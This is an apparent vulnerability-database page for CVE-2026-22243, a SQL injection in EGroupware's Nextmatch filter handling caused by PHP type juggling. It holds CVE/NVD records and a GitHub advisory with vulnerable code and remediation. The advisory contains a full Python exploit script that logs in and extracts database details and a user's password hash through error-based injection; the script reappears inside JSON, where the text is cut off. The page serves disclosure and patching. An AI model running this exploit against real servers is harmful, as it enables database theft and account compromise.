Vulnerability-Lookup

CVE-2026-22243 (GCVE-0-2026-22243)

Vulnerability from cvelistv5 – Published: 2026-01-28 16:05 – Updated: 2026-01-28 16:28

Title

EGroupware has SQL Injection in Nextmatch Filter Processing

Summary

EGroupware is a Web based groupware server written in PHP. A SQL Injection vulnerability exists in the core components of EGroupware prior to versions 23.1.20260113 and 26.0.20260113, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application. Versions 23.1.20260113 and 26.0.20260113 patch the vulnerability.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/EGroupware/egroupware/security…	x_refsource_CONFIRM
	https://github.com/EGroupware/egroupware/releases…	x_refsource_MISC
	https://github.com/EGroupware/egroupware/releases…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	EGroupware	egroupware	Affected: < 23.1.20260113 Affected: < 26.0.20260113

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-22243",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-28T16:27:48.437430Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-28T16:28:24.378Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "egroupware",
          "vendor": "EGroupware",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 23.1.20260113"
            },
            {
              "status": "affected",
              "version": "\u003c 26.0.20260113"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "EGroupware is a Web based groupware server written in PHP. A SQL Injection vulnerability exists in the core components of EGroupware prior to versions 23.1.20260113 and 26.0.20260113, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application. Versions 23.1.20260113 and 26.0.20260113 patch the vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-28T16:05:35.641Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx"
        },
        {
          "name": "https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113"
        },
        {
          "name": "https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113"
        }
      ],
      "source": {
        "advisory": "GHSA-rvxj-7f72-mhrx",
        "discovery": "UNKNOWN"
      },
      "title": "EGroupware has SQL Injection in Nextmatch Filter Processing"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-22243",
    "datePublished": "2026-01-28T16:05:35.641Z",
    "dateReserved": "2026-01-07T05:19:12.920Z",
    "dateUpdated": "2026-01-28T16:28:24.378Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-22243\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-01-28T17:16:15.663\",\"lastModified\":\"2026-01-29T16:31:00.867\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"EGroupware is a Web based groupware server written in PHP. A SQL Injection vulnerability exists in the core components of EGroupware prior to versions 23.1.20260113 and 26.0.20260113, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application. Versions 23.1.20260113 and 26.0.20260113 patch the vulnerability.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"references\":[{\"url\":\"https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-22243\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-28T16:27:48.437430Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-28T16:28:13.675Z\"}}], \"cna\": {\"title\": \"EGroupware has SQL Injection in Nextmatch Filter Processing\", \"source\": {\"advisory\": \"GHSA-rvxj-7f72-mhrx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"EGroupware\", \"product\": \"egroupware\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 23.1.20260113\"}, {\"status\": \"affected\", \"version\": \"\u003c 26.0.20260113\"}]}], \"references\": [{\"url\": \"https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx\", \"name\": \"https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113\", \"name\": \"https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113\", \"name\": \"https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"EGroupware is a Web based groupware server written in PHP. A SQL Injection vulnerability exists in the core components of EGroupware prior to versions 23.1.20260113 and 26.0.20260113, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application. Versions 23.1.20260113 and 26.0.20260113 patch the vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-01-28T16:05:35.641Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-22243\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-28T16:28:24.378Z\", \"dateReserved\": \"2026-01-07T05:19:12.920Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-01-28T16:05:35.641Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-22243

Vulnerability from fkie_nvd - Published: 2026-01-28 17:16 - Updated: 2026-01-29 16:31

Severity ?

8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113
	security-advisories@github.com	https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113
	security-advisories@github.com	https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "EGroupware is a Web based groupware server written in PHP. A SQL Injection vulnerability exists in the core components of EGroupware prior to versions 23.1.20260113 and 26.0.20260113, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application. Versions 23.1.20260113 and 26.0.20260113 patch the vulnerability."
    }
  ],
  "id": "CVE-2026-22243",
  "lastModified": "2026-01-29T16:31:00.867",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-28T17:16:15.663",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-RVXJ-7F72-MHRX

Vulnerability from github – Published: 2026-01-28 20:39 – Updated: 2026-01-28 20:39

Summary

EGroupware has SQL Injection in Nextmatch Filter Processing

Details

Summary

Critical Authenticated SQL Injection in Nextmatch Widget Filter Processing

A critical SQL Injection vulnerability exists in the core components of EGroupware, specifically in the Nextmatch filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the WHERE clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the is_int() security check used by the application.

Details

Root Cause Analysis The vulnerability exists in how the database abstraction layer (Api\Db) and high-level storage classes (Api\Storage\Base, infolog_so) process the col_filter array used in "Nextmatch" widgets.

The application attempts to validate input using is_int($key) to determine if an array key represents a raw SQL fragment that should be trusted. However, when processing JSON-based POST requests, PHP's json_decode automatically converts numeric string keys (e.g., "0") into native integers.

Consequently, an attacker can send a JSON payload with an associative array containing numeric keys. The application interprets these keys as integers (is_int returns true) and blindly appends the associated values - containing malicious SQL - directly to the query.

Vulnerable Code Locations

File: sources/egroupware/api/src/Db.php (Approx. Line 1776) Method: column_data_implode

// In function column_data_implode
elseif (is_int($key) && $use_key===True) {
     if (empty($data)) continue;
     // VULNERABLE: $data is appended directly to SQL without sanitization
     $values[] = $data; 
}

File: sources/egroupware/api/src/Storage/Base.php (Approx. Line 1134) Method: parse_search

// In function parse_search
foreach($criteria as $col => $val) {
     // VULNERABLE: is_int() returns true for JSON keys like "0"
     if (is_int($col)) {
         $query[] = $val; 
     }
     // ...
}

PoC

The vulnerability was on a local Docker instance and confirmed (read-only) on the public demo instance (demo.egroupware.net).

Automated Exploit Script: The following script automates the login, exec_id extraction, and data exfiltration via Error-Based SQL Injection.

import requests
import re
import sys
import urllib3

# Suppress SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# CLI Configuration
BASE_URL = sys.argv[1].rstrip('/') if len(sys.argv) > 1 else "http://localhost:8088/egroupware"
LOGIN_USER = sys.argv[2] if len(sys.argv) > 2 else "sysop"
LOGIN_PASS = sys.argv[3] if len(sys.argv) > 3 else "password123"

session = requests.Session()
session.verify = False
session.headers.update({
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
})

def extract_form_inputs(html):
    inputs = {}
    matches = re.findall(r'<input[^>]+>', html)
    for match in matches:
        name_m = re.search(r'name=["\']([^"\']+)["\']', match)
        value_m = re.search(r'value=["\']([^"\']*)["\']', match)
        if name_m:
            name = name_m.group(1)
            value = value_m.group(1) if value_m else ""
            inputs[name] = value
    return inputs

def login():
    print(f"[*] Target: {BASE_URL}")
    login_url = f"{BASE_URL}/login.php"

    try:
        print("[*] Retrieving login form...")
        r_get = session.get(login_url, timeout=10)

        data = extract_form_inputs(r_get.text)

        data.update({
            "login": LOGIN_USER,
            "passwd": LOGIN_PASS,
            "submitit": "Login",
            "passwd_type": "text"
        })

        if 'cancel' in data: del data['cancel']

        print(f"[*] Attempting login as: {LOGIN_USER}...")
        r_post = session.post(login_url, data=data, allow_redirects=True, timeout=15)

        if 'name="passwd"' in r_post.text and 'logout.php' not in r_post.text:
            print("[-] Login failed. Server returned login form.")
            return False

        print("[+] Login successful.")
        return True
    except Exception as e:
        print(f"[-] Critical error during login: {e}")
        return False

def get_exec_id():
    print("[*] Retrieving exec_id...")
    url = f"{BASE_URL}/index.php?menuaction=addressbook.addressbook_ui.index"
    try:
        r = session.get(url, timeout=10)

        match = re.search(r'etemplate_exec_id(?:&quot;|"|\\")\s*:\s*(?:&quot;|"|\\")([^&"\\]+)', r.text)

        if match:
            eid = match.group(1)
            print(f"[+] ID found: {eid}")
            return eid
        else:
            if 'name="passwd"' in r.text:
                print("[-] Session expired or login failed.")
            else:
                print("[-] exec_id pattern not found in source code.")
    except Exception as e:
        print(f"[-] Error retrieving ID: {e}")
    return None

def run_query(eid, sql):
    full = ""
    url = f"{BASE_URL}/json.php?menuaction=EGroupware\\Api\\Etemplate\\Widget\\Nextmatch::ajax_get_rows"

    print(f"[*] Executing SQLi: {sql}")

    for offset in range(1, 201, 30):
        chunk_sql = f"SUBSTRING(({sql}), {offset}, 30)"
        payload = f"1=1 AND EXTRACTVALUE(1, CONCAT(0x7e, ({chunk_sql}), 0x7e))"

        post_data = {
            "request": {
                "parameters": [eid, {"start": 0, "num_rows": 1}, {"col_filter": {"0": payload}}]
            }
        }

        try:
            r = session.post(url, json=post_data, timeout=10)

            match = re.search(r"XPATH syntax error: '~(.*)~'", r.text)
            if not match:
                match = re.search(r"~([^~]+)~", r.text)

            if match:
                chunk = match.group(1)
                if "..." in chunk: chunk = chunk.replace("...", "")

                full += chunk
                if len(chunk) < 1: break
            else:
                break

        except Exception as e:
            print(f"[-] Query error: {e}")
            break

    return full if full else "NO DATA / ERROR"

if __name__ == "__main__":
    if login():
        eid = get_exec_id()
        if eid:
            print("\n" + "="*40)
            print(" SQL INJECTION RESULTS ")
            print("="*40)
            print(f"[+] DB Version: {run_query(eid, 'SELECT @@version')}")
            print(f"[+] DB Name:    {run_query(eid, 'SELECT database()')}")
            print(f"[+] DB User:    {run_query(eid, 'SELECT user()')}")

            print("\n[*] Retrieving hash for 'sysop' user (if exists):")
            res = run_query(eid, "SELECT CONCAT(account_lid,':',account_pwd) FROM egw_accounts WHERE account_lid='sysop'")
            print(f" > {res}")
            print("="*40 + "\n")

Proof of Verification on demo.egroupware.net:

The script was executed against ther public demo to confirm exploitability in a production-like environment (read-only).

Impact: Attackers with low-privileged access can fully compromise the database. This allows for: * Confidentiality Loss: Reading sensitive data (e.g., password hashes, session tokens, personal contact details, configuration secrets). * Integrity Loss: Modifying or deleting arbitrary data within the application. * Availability Loss: Potential to drop tables or corrupt data.

Remediation

1. Input Validation (Whitelisting) Do not rely solely on is_int() for security decisions when handling external input, especially JSON data where keys can be numeric strings. Implement a strict whitelist (allowlist) of allowed column names for filtering in Nextmatch widgets. If the key/column is not in the whitelist, reject the request.

2. Parameter Binding Ensure all filter values are bound as parameters (prepared statements) rather than being concatenated directly into the SQL string.

3. Strict Type Checking When processing JSON input, ensure that keys are strictly checked against expected types (e.g., using === for strict comparison or filter_var) before being used in SQL generation logic.

Credits

Reported by Łukasz Rybak

Severity ?

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "egroupware/egroupware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "23.1.20260113"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "egroupware/egroupware"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "26.0.20251208"
            },
            {
              "fixed": "26.0.20260113"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22243"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-28T20:39:27Z",
    "nvd_published_at": "2026-01-28T17:16:15Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n**Critical Authenticated SQL Injection in Nextmatch Widget Filter Processing**\n\nA critical SQL Injection vulnerability exists in the core components of EGroupware, specifically in the `Nextmatch` filter processing. The flaw allows authenticated attackers to inject arbitrary SQL commands into the `WHERE` clause of database queries. This is achieved by exploiting a PHP type juggling issue where JSON decoding converts numeric strings into integers, bypassing the `is_int()` security check used by the application.\n\n### Details\n**Root Cause Analysis**\nThe vulnerability exists in how the database abstraction layer (`Api\\Db`) and high-level storage classes (`Api\\Storage\\Base`, `infolog_so`) process the `col_filter` array used in \"Nextmatch\" widgets.\n\nThe application attempts to validate input using `is_int($key)` to determine if an array key represents a raw SQL fragment that should be trusted. However, when processing JSON-based POST requests, PHP\u0027s `json_decode` automatically converts numeric string keys (e.g., `\"0\"`) into native integers.\n\nConsequently, an attacker can send a JSON payload with an associative array containing numeric keys. The application interprets these keys as integers (`is_int` returns true) and blindly appends the associated values - containing malicious SQL - directly to the query.\n\n**Vulnerable Code Locations**\n\n1. **File:** `sources/egroupware/api/src/Db.php` (Approx. Line 1776)\n   Method: `column_data_implode`\n\n```php\n// In function column_data_implode\nelseif (is_int($key) \u0026\u0026 $use_key===True) {\n     if (empty($data)) continue;\n     // VULNERABLE: $data is appended directly to SQL without sanitization\n     $values[] = $data; \n}\n```\n\n2. **File:** `sources/egroupware/api/src/Storage/Base.php` (Approx. Line 1134)\n   Method: `parse_search`\n\n```php\n// In function parse_search\nforeach($criteria as $col =\u003e $val) {\n     // VULNERABLE: is_int() returns true for JSON keys like \"0\"\n     if (is_int($col)) {\n         $query[] = $val; \n     }\n     // ...\n}\n```\n\n### PoC\nThe vulnerability was on a local Docker instance and confirmed (read-only) on the public demo instance ([demo.egroupware.net](http://demo.egroupware.net/)).\n\n\n**Automated Exploit Script:**\nThe following script automates the login, exec_id extraction, and data exfiltration via Error-Based SQL Injection.\n\n```python\nimport requests\nimport re\nimport sys\nimport urllib3\n\n# Suppress SSL warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# CLI Configuration\nBASE_URL = sys.argv[1].rstrip(\u0027/\u0027) if len(sys.argv) \u003e 1 else \"http://localhost:8088/egroupware\"\nLOGIN_USER = sys.argv[2] if len(sys.argv) \u003e 2 else \"sysop\"\nLOGIN_PASS = sys.argv[3] if len(sys.argv) \u003e 3 else \"password123\"\n\nsession = requests.Session()\nsession.verify = False\nsession.headers.update({\n    \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36\"\n})\n\ndef extract_form_inputs(html):\n    inputs = {}\n    matches = re.findall(r\u0027\u003cinput[^\u003e]+\u003e\u0027, html)\n    for match in matches:\n        name_m = re.search(r\u0027name=[\"\\\u0027]([^\"\\\u0027]+)[\"\\\u0027]\u0027, match)\n        value_m = re.search(r\u0027value=[\"\\\u0027]([^\"\\\u0027]*)[\"\\\u0027]\u0027, match)\n        if name_m:\n            name = name_m.group(1)\n            value = value_m.group(1) if value_m else \"\"\n            inputs[name] = value\n    return inputs\n\ndef login():\n    print(f\"[*] Target: {BASE_URL}\")\n    login_url = f\"{BASE_URL}/login.php\"\n    \n    try:\n        print(\"[*] Retrieving login form...\")\n        r_get = session.get(login_url, timeout=10)\n        \n        data = extract_form_inputs(r_get.text)\n        \n        data.update({\n            \"login\": LOGIN_USER,\n            \"passwd\": LOGIN_PASS,\n            \"submitit\": \"Login\",\n            \"passwd_type\": \"text\"\n        })\n        \n        if \u0027cancel\u0027 in data: del data[\u0027cancel\u0027]\n\n        print(f\"[*] Attempting login as: {LOGIN_USER}...\")\n        r_post = session.post(login_url, data=data, allow_redirects=True, timeout=15)\n        \n        if \u0027name=\"passwd\"\u0027 in r_post.text and \u0027logout.php\u0027 not in r_post.text:\n            print(\"[-] Login failed. Server returned login form.\")\n            return False\n            \n        print(\"[+] Login successful.\")\n        return True\n    except Exception as e:\n        print(f\"[-] Critical error during login: {e}\")\n        return False\n\ndef get_exec_id():\n    print(\"[*] Retrieving exec_id...\")\n    url = f\"{BASE_URL}/index.php?menuaction=addressbook.addressbook_ui.index\"\n    try:\n        r = session.get(url, timeout=10)\n        \n        match = re.search(r\u0027etemplate_exec_id(?:\u0026quot;|\"|\\\\\")\\s*:\\s*(?:\u0026quot;|\"|\\\\\")([^\u0026\"\\\\]+)\u0027, r.text)\n        \n        if match:\n            eid = match.group(1)\n            print(f\"[+] ID found: {eid}\")\n            return eid\n        else:\n            if \u0027name=\"passwd\"\u0027 in r.text:\n                print(\"[-] Session expired or login failed.\")\n            else:\n                print(\"[-] exec_id pattern not found in source code.\")\n    except Exception as e:\n        print(f\"[-] Error retrieving ID: {e}\")\n    return None\n\ndef run_query(eid, sql):\n    full = \"\"\n    url = f\"{BASE_URL}/json.php?menuaction=EGroupware\\\\Api\\\\Etemplate\\\\Widget\\\\Nextmatch::ajax_get_rows\"\n    \n    print(f\"[*] Executing SQLi: {sql}\")\n    \n    for offset in range(1, 201, 30):\n        chunk_sql = f\"SUBSTRING(({sql}), {offset}, 30)\"\n        payload = f\"1=1 AND EXTRACTVALUE(1, CONCAT(0x7e, ({chunk_sql}), 0x7e))\"\n        \n        post_data = {\n            \"request\": {\n                \"parameters\": [eid, {\"start\": 0, \"num_rows\": 1}, {\"col_filter\": {\"0\": payload}}]\n            }\n        }\n        \n        try:\n            r = session.post(url, json=post_data, timeout=10)\n            \n            match = re.search(r\"XPATH syntax error: \u0027~(.*)~\u0027\", r.text)\n            if not match:\n                match = re.search(r\"~([^~]+)~\", r.text)\n            \n            if match:\n                chunk = match.group(1)\n                if \"...\" in chunk: chunk = chunk.replace(\"...\", \"\")\n                \n                full += chunk\n                if len(chunk) \u003c 1: break\n            else:\n                break\n                \n        except Exception as e:\n            print(f\"[-] Query error: {e}\")\n            break\n            \n    return full if full else \"NO DATA / ERROR\"\n\nif __name__ == \"__main__\":\n    if login():\n        eid = get_exec_id()\n        if eid:\n            print(\"\\n\" + \"=\"*40)\n            print(\" SQL INJECTION RESULTS 